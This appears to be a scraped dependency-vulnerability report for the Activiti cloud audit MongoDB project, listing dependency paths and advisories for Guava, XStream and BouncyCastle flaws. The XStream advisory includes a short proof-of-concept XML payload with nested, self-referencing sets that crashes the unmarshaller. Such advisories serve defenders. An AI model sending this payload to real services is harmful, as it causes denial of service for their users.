Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-kqueue@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http2@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-epoll@4.2.7.Final › io.netty:netty-transport-classes-epoll@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-io_uring@4.2.7.Final › io.netty:netty-transport-classes-io_uring@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-kqueue@4.2.7.Final › io.netty:netty-transport-classes-kqueue@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http2@4.2.7.Final › io.netty:netty-codec-http@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http3@4.2.7.Final › io.netty:netty-codec-http@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-resolver-dns@4.2.7.Final › io.netty:netty-codec-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-resolver-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-handler-proxy@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-handler-proxy@4.2.7.Final › io.netty:netty-codec-http@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-resolver-dns@4.2.7.Final › io.netty:netty-codec-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-resolver-dns-native-macos@4.2.7.Final › io.netty:netty-resolver-dns-classes-macos@4.2.7.Final › io.netty:netty-resolver-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-handler-proxy@4.2.7.Final › io.netty:netty-codec-socks@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-resolver-dns-native-macos@4.2.7.Final › io.netty:netty-resolver-dns-classes-macos@4.2.7.Final › io.netty:netty-resolver-dns@4.2.7.Final › io.netty:netty-codec-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-resolver-dns-native-macos@4.2.7.Final › io.netty:netty-resolver-dns-classes-macos@4.2.7.Final › io.netty:netty-resolver-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-resolver-dns-native-macos@4.2.7.Final › io.netty:netty-resolver-dns-classes-macos@4.2.7.Final › io.netty:netty-resolver-dns@4.2.7.Final › io.netty:netty-codec-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.google.guava:guava is a set of core libraries that includes new collection types (such as multimap and multiset,immutable collections, a graph library, functional types, an in-memory cache and more.
Affected versions of this package are vulnerable to Deserialization of Untrusted Data. During deserialization, two Guava classes accept a caller-specified size parameter and eagerly allocate an array of that size:
AtomicDoubleArray(when serialized with Java serialization)CompoundOrdering(when serialized with GWT serialization)
An attacker may be able to send a specially crafted request which with then cause the server to allocate all it's memory, without validation whether the data size is reasonable.
Details
Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.
Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.
Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.
An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.
Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).
Remediation
Upgrade com.google.guava:guava to version 24.1.1, 24.1.1-jre or higher.
References
medium severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Denial of Service (DoS). An attacker can manipulate the processed input stream at unmarshalling time, and replace or inject objects. This can result in a stack overflow calculating a recursive hash set, causing a denial of service.
Workaround
This effects of this vulnerability can be avoided by catching the StackOverflowError in the calling application.
PoC
Create a simple HashSet and use XStream to marshal it to XML. Replace the XML with following snippet and unmarshal it with XStream.
<div class="Source XML"><pre>
<set>
<set>
<set>
<set>
<set>
<set>
<string>a</string>
</set>
<set>
<string>b</string>
</set>
</set>
<set>
<string>c</string>
<set reference='../../../set/set[2]'/>
</set>
</set>
</set>
</set>
</set>;
</pre></div>
<div class="Source Java"><pre>XStream xstream = new XStream();
xstream.fromXML(xml);
</pre></div>
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.20 or higher.
References
medium severity
- Vulnerable module: org.bouncycastle:bcprov-jdk15on
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.keycloak:keycloak-jetty-core@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.keycloak:keycloak-jetty-core@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
Overview
org.bouncycastle:bcprov-jdk15on is a Java implementation of cryptographic algorithms.
Affected versions of this package are vulnerable to Observable Discrepancy due to the timing difference between exceptions thrown when processing RSA key exchange handshakes, AKA Marvin.
Note: The implemented fix mitigates the leakage of data via the PKCS#1 interface, but does not fully alleviate the side-channel as it allows cases in which the padding check fails but the handshake succeeds.
Remediation
There is no fixed version for org.bouncycastle:bcprov-jdk15on.
References
medium severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
